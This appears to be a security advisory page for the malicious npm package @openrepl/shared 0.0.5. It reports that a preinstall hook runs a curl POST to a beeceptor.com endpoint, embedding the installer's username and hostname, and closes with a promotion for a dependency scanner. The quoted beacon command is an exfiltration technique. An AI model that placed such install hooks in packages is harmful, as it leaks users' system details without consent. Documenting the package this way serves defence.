npm

@openrepl/shared @0.0.5

Vulnerability report · Last retrieved from osv.dev August 15, 2026 at 10:37 PM UTC

Malicious

OSV ID

MAL-2026-14057

Ecosystem

npm

Summary

package.json declares a preinstall hook ( node index.js ) that runs automatically on npm install . index.js shells out via child_process to execute curl -X POST against https://youjoex.free.beeceptor.com/$(whoami)/$(hostname) , embedding the installer's OS username and hostname (captured via command substitution) in the URL path. beeceptor.com is a public request-inspection service commonly used as a low-effort exfiltration sink. The package advertises no functionality that would justify this network beacon and ships no other library code consistent with its shared name.

Source: amazon-inspector (2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.